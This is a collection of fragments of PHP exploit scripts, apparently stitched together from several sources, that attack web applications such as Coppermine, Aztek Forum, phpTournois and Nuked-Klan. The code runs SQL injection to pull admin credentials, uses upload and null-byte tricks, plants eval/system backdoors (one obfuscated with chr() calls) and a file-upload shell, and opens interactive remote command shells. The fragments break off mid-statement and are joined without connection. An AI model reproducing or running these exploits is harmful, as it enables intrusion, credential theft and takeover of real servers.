} else { return; } } $url = getparam("url", 1); $login = getparam("login", 1); $pass = getparam("pass", 1); $email = getparam("email", 1); $file = getparam("file", 1); $id = getparam("id"); $source = @file_get_contents($file); if (strlen($source) < 2) { exit("{$file} don't exist.\n"); } $xpl = new phpsploit(); $s = $xpl->post($url . "/index.php?", "sql_pseudo={$login}&sql_pass={$pass}"); //Cookies if (preg_match("#Set-Cookie: PHPSESSID=([a-z0-9]+)#i", $s, $phpsessid) && !preg_match("#name=\"sql_pseudo\"#i", $s)) { $xpl->addcookie("PHPSESSID", $phpsessid[1]); $xpl->addcookie("sql_pseudo", $login); $xpl->addcookie("sql_pass", md5($pass)); $xpl->addcookie("auto", "off"); print "[*] PHPSESSID : {$phpsessid['1']}\n"; } else { exit("[*] Can't log in\n"); } //Id if (!isset($id)) { preg_match("#id=([0-9]+)\" title=\"Voir son profil\">" . $login . "<\\/a>#i", $s, $id_member); $id = $id_member[1]; }
Table prefix. /*/ print "\nstatus> Searching the version"; $xpl->get($url . 'include/index.html'); if (preg_match("#Coppermine version: ([0-9]*\\.[0-9]*\\.[0-9]*)#", $xpl->getcontent(), $matches)) { print "\nsploit> Coppermine version " . $matches[1]; } else { print "\nsploit> Not found"; } $table = !empty($matches[1]) ? 'cpg' . str_replace('.', '', $matches[1]) . '_users' : 'cpg1410_users'; /*/ If you have the admin cookie (but not the password), replace lines 73=>76 by $xpl->addcookie('yourcookie'); /*/ print "\nstatus> Trying to get logged in"; $xpl->post($url . "login.php?referer=index.php", "username={$adu}&password={$adp}&remember_me=1&submitted=Se+Connecter"); if (!preg_match("#color:red#", $xpl->getcontent())) { print "\nsploit> Done"; } else { die("\nstatus> Exploit failed\n"); } /*/ (usermgr.php) ============= case 'group_alb_access' : if (isset($_GET['gid'])) $group_id = $_GET['gid']; $sql = "SELECT group_name FROM [...] WHERE group_id = $group_id [...]"; $result = cpg_db_query($sql); (db_ecard.php) ==============
if (!empty($pra)) { $xpl->proxyauth($pra); } print "\nheader> Aztek Forum 4.1 Multiple Vulnerabilities Exploit"; print "\nheader> =================================================="; if (preg_match("#href='\\./index\\.php\\?owner=(\\S*)'#i", $xpl->getcontent($xpl->get($url . 'forum.php?fid=-1%20or%201=1')), $matches)) { print "\nsploit> Owner -> " . $matches[1]; } else { die("\nsploit> Exploit failed"); } $owner = $matches[1]; print "\nstatus> Trying to register a new user"; $xpl->cookiejar(1); $xpl->allowredirection(1); $name = "phpsploit" . rand(); $xpl->post($url . "index.php?owner={$owner}&action=subscribe", "login={$name}&passwd={$name}&passwd2={$name}&email={$name}%40hotmail.coum&show_email=on&cookie=on"); print "\nsploit> Login/Password -> {$name}"; print "\nstatus> Trying to get database informations"; $xpl->get($url . "forum.php?fid=XD"); if (preg_match("#file (.*) in function#i", $xpl->getcontent(), $matches)) { print "\nsploit> Full Path Disclosure -> " . $matches[1]; } else { print "\nsploit> Failed"; } $wanted = str_replace("forum/load.php", "common/bddconf.php", $matches[1]); if (!empty($wanted)) { $xpl->get($url . "index.php?owner={$owner}&action=profile&_SERVER[email]={$name}%40hotmail.coum&_FILES[upload][tmp_name]={$wanted}&_FILES[upload][name]=0123456789&_FILES[upload][type]=jpg"); $xpl->get($url . "index.php?owner={$owner}&choix=3"); if (preg_match("#<IMG src='(.*)' width='([0-9]*)' height='([0-9]*)'>#i", $xpl->getcontent(), $matches)) { print "\nsploit> Done (" . $matches[1] . ")"; } else {
$url = getparam('url', true); $prx = getparam('proxy', false); $pra = getparam('proxyauth', false); $cod = 'eval($_SERVER[HTTP_SHELL]);'; $xpl = new phpsploit(); $xpl->agent('Mozilla Firefox'); $xpl->allowredirection(1); $xpl->cookiejar(1); if ($prx) { $xpl->proxy($prx); } if ($pra) { $xpl->proxyauth($pra); } print "0x01>Deleting the file auth.inc.php"; $xpl->post($url . 'dirsys/modules/auth.php', 'suppr=1'); print "\n0x02>Creating the file auth.inc.php"; $xpl->post($url . 'dirsys/modules/auth.php', 'login=root&password=toor'); print "\n0x03>Trying to log in as Administrator"; $xpl->post($url . 'dirsys/modules/auth.php', 'login=root&password=toor'); // Minimum data necessary (fwrite without quote) $minimdata = 'WIDTH_TREE_FRAME=1&FRAME_BORDER=1&WIDTH_FRAME_BORDER=1&WIDTH_FRAME_SP' . 'ACING=1&SCROLING_TREE_FRAME=1&RESIZE_FRAME=1&WIDTH_TD_SIZE=1&WIDTH_TD' . '_TYPE=1&WIDTH_TD_DATE=1&STYLE=1&TOTALSIZE=1&CHECK_MAJ=1&IMAGE_BROWSER' . '=1&IMAGE_TN=1&GD2=1&IMAGE_JPG=1&IMAGE_GIF=1&IMAGE_BMP=1&IMAGE_TN_SIZE' . '=1&IMAGE_TN_COMPRESSION=1&NB_COLL_TN=1&EXIF_READER=1&SLIDE_SHOW=1&DEB' . 'UG=0;' . urlencode($cod) . '//&SLIDE_SHOW_INT=1&BACK=1&WRITE_TN=1&AUTO_RE' . 'SIZE=1&DETAILS=1&DIRINFO_LIFE=1&activer_Message=1'; print "\n0x04>Creating the file config.inc.php"; $xpl->post($url . 'dirsys/modules/config/post.php', $minimdata); print "\n0x05>Now enter your commands"; do { $xpl->addheader('Shell', "@system({$cmd});"); $xpl->get($url . 'dirsys/config.inc.php'); print $xpl->getcontent() . "\n0x06>"; } while (!eregi('^quit|exit$', $cmd = trim(fgets(STDIN)))); exit(0);
$avatar = array(frmdt_url => $url . '?page=avatars&op=modify', 'avatar' => array(frmdt_filename => '1.gif', frmdt_type => 'image/gif', frmdt_content => $c0de), 'id' => 1, 'mode' => 'J', 'avatarurl' => '', 'avatarremoteurl' => '', 'MAX_FILE_SIZE' => 999999); if (preg_match("#location.href='\\?page=avatars&id=\\d+&mode=J'#i", $xpl->formdata($avatar))) { print "done\n"; } else { die("error\n"); } if (preg_match('#<span style="float: right;" ><img src="([^"]+)#i', $xpl->get($url . '?page=joueurs&id=1'), $match)) { $img = $match[1]; } else { die(" * can't find image name\n"); } /* Change homepage to our avatar, with a null byte, after saving website name. */ print " * changing homepage\t"; preg_match('#name=nomsite value="([^ ]+)"#i', $xpl->get($url . '?page=configuration&op=admin'), $all); $postdata = "nomsite={$all['1']}&urlsite={$url}&logo=logo.gif&pagestart=../.{$img}%00&inscription_joueur=1&inscription_equipe=1&places=200&emailcontact=&emailinscription=&langue=english&theme=phptournois&gzip=1&poulewin=3&poulenull=2&pouleloose=1&poulefor=0&information=®lement=&decharge=&shoutbox=1&shoutlimit=20&shoutboxc=255&news=1&ladder=1&messagerie=1&support=0&faq=1&serveur=1&download=1&liens=1&galerie=1&livredor=1&sponsors=0&partenaires=1&forum=1&contact=1&horloge=1&commande=1&avatar=A&avatar_upload=1&avatar_remote=1&avatar_gallerie=0&avatar_filesize_max=100000&avatar_x_max=80&avatar_y_max=80&irc=1&ircserver=euroserv.fr.quakenet.org&ircport=6667&ircpassword=&ircchannels=%23phptournois+%23lan+%23lan.cs+%23lan.q3&mail=N&smtpserver=&smtpuser=&smtppassword="******"done\n"; $success = true; if ($mode == 0) { print " * loading uploader\t"; $xpl->addheader("upload", "1"); if (preg_match("#upfiledone#i", $xpl->get($url))) { print "done\n"; } else { $success = false; print "error\n"; } } else { print "\n\$shell> "; while (!preg_match("#^(quit|exit)\$#", $cmd = trim(fgets(STDIN)))) { $xpl->reset('header');
$adm = getparam("admin"); $acc = getparam("user"); $prx = getparam("proxy"); $prefix = getparam("prefix") ? getparam("prefix") : "nuked_"; $file_upload_code = getparam("file") ? file_get_contents(getparam("file")) : '<?php if(isset($_POST[\'upload\'])) { if( !move_uploaded_file($_FILES[\'file\'][\'tmp_name\'], "./".$_FILES[\'file\'][\'name\'])) echo("<center>Error ".$_FILES[\'file\'][\'error\']."</center>");else echo "<center>File uploaded</center>"; } ?><form method="post" enctype="multipart/form-data"><center><input type="file" name="file"><input type="submit" name="upload" value="Upload"></center></form>'; $date = array(date('Y'), date('m'), date('d')); $xpl = new phpsploit(); if ($prx) { $xpl->proxy($prx); } /* Admin account defined */ if ($adm) { print "[*] Using admin account {$adm}\n"; list($login, $passwd) = explode(":", $adm); $xpl->addheader("Referer", $url); $c = $xpl->post($url . "index.php?file=User&{$prefix}nude=index&op=login", "pseudo={$login}&pass={$passwd}&remember_me=ok"); if (preg_match("#{$prefix}sess_id=([a-z0-9]+)#i", $c, $sid) && preg_match("#uid=([a-z0-9]+)#i", $c, $uid)) { $admin_sid = $sid[1]; $admin_uid = $uid[1]; print " SID -> {$admin_sid}\n"; print " UID -> {$admin_uid}\n"; finalattack($admin_sid, $admin_uid); } else { exit("[*] Can't log in\n"); } } else { /* User account defined */ if ($acc) { print "[*] Using user account {$acc}\n"; list($login, $passwd) = explode(":", $acc); $xpl->addheader("Referer", $url);
| ... sql_select_query("msg", "alex_livre_txt_lang", "WHERE lang='".$f_language."' and `type`='titre'"); | // "SELECT msg FROM `alex_livre_txt_lang` WHERE lang='$f_language' and type=`titre` | /*/ $sql = "index.php?lang=english.php%00'%20union%20select%20" . "concat('XPLLogin:'******'XPLPass:'******'#<div class="d_title">XPLLogin:(.*)XPLPass:(.*)</div>#', $xpl->getcontent(), $count)) { print "\nsploit> AdminUsername::" . $count[1] . "\nsploit> AdminPassword::" . $count[2]; } else { die("\nsploit> Exploit failed"); } print "\nstatus> Trying to get logged in"; $xpl->post($url . "admin/index.php", "f_login="******"&f_pass="******"&f_identif=Identification"); if (preg_match("#f_cadres\\.php\\?f_sid=([a-z0-9]{32})#", $xpl->getheader(), $sid)) { print "\nsploit> Done"; } else { die("\nsploit> Exploit failed"); } print "\nstatus> Trying to add a skin"; // skins.php ... @mkdir($chem_absolu."templates/skins/".$_POST['aj_skin']."/", 0755) $xpl->post($url . "admin/skins.php?f_sid=" . $sid[1], "aj_skin=../../languages/d4h4x0rskin&ajouter=Ajouter"); if (!preg_match('#alert\\("ERREUR\\n#', $xpl->getcontent())) { print "\nsploit> Done"; } else { die("\nsploit> Exploit failed"); } $scode = "chr(0x73).chr(0x79).chr(0x73).chr(0x74).chr(0x65).chr(0x6d)." . "chr(0x28).chr(0x73).chr(0x74).chr(0x72).chr(0x69).chr(0x70)." . "chr(0x73).chr(0x6c).chr(0x61).chr(0x73).chr(0x68).chr(0x65)." . "chr(0x73).chr(0x28).chr(0x24).chr(0x5f).chr(0x53).chr(0x45)." . "chr(0x52).chr(0x56).chr(0x45).chr(0x52).chr(0x5b).chr(0x27)." . "chr(0x48).chr(0x54).chr(0x54).chr(0x50).chr(0x5f).chr(0x52)." . "chr(0x45).chr(0x46).chr(0x45).chr(0x52).chr(0x45).chr(0x52)." . "chr(0x27).chr(0x5d).chr(0x29).chr(0x29).chr(0x3b)"; $data = "skin_edit=skins.php%3Ff_sid%3D" . $sid[1] . "%26skin_edit" . "%3D../../languages/d4h4x0rskin&alex_livre=<?php\r\n@e" . "val({$scode});exit(0);\r\n?>&add_message=&nb_message_pa" . "ge=&list_pages=&corps_messages=&space=&assembly=&enre" . "gistrer=Enregistrer";
$xpl->addheader('Referer', $url); $xpl->formdata($phpc); $xpl->get($url . '?file=User&op=edit_pref'); if (!preg_match('#\\<input name=\\"photo\\" value=\\"(\\S+)\\"#', $xpl->getcontent(), $match)) { exit("\nNo file found"); } else { print "\n\$shell> "; } $sql = array(); $sql[] = "ALTER TABLE {$config['0']}_block CHANGE `type` `type` VARCHAR(60) CHARACTER SET latin1 COLLATE latin1_swedish_ci NOT NULL DEFAULT 0;"; /* $sql[] = "UPDATE $config[0]_config SET avatar_upload=".char('on')." WHERE name=".char('avatar_upload').";";*/ $sql[] = "UPDATE {$config['0']}_block SET type=" . char('/../../../' . $match[1] . "") . " WHERE bid=1;"; $sql[] = "DELETE FROM {$config['0']}_nbconnecte;"; for ($i = 0; $i < count($sql); $i++) { $xpl->post($url . '?file=Admin&page=mysql&op=upgrade_db', 'upgrade=' . $sql[$i]); } while (!preg_match("#^(quit|exit)\$#", $cmd = trim(fgets(STDIN)))) { # 0'); include('./conf.inc.php'); print $global['db_pass']; // $xpl->reset('header'); $xpl->addheader('Shell', "system('{$cmd}');"); $xpl->get($url); $data = explode('123456789', $xpl->getcontent()); print $data[1] . "\n\$shell> "; } function char($data) { $char = 'CHAR('; for ($i = 0; $i < strlen($data); $i++) { $char .= ord($data[$i]); if ($i != strlen($data) - 1) {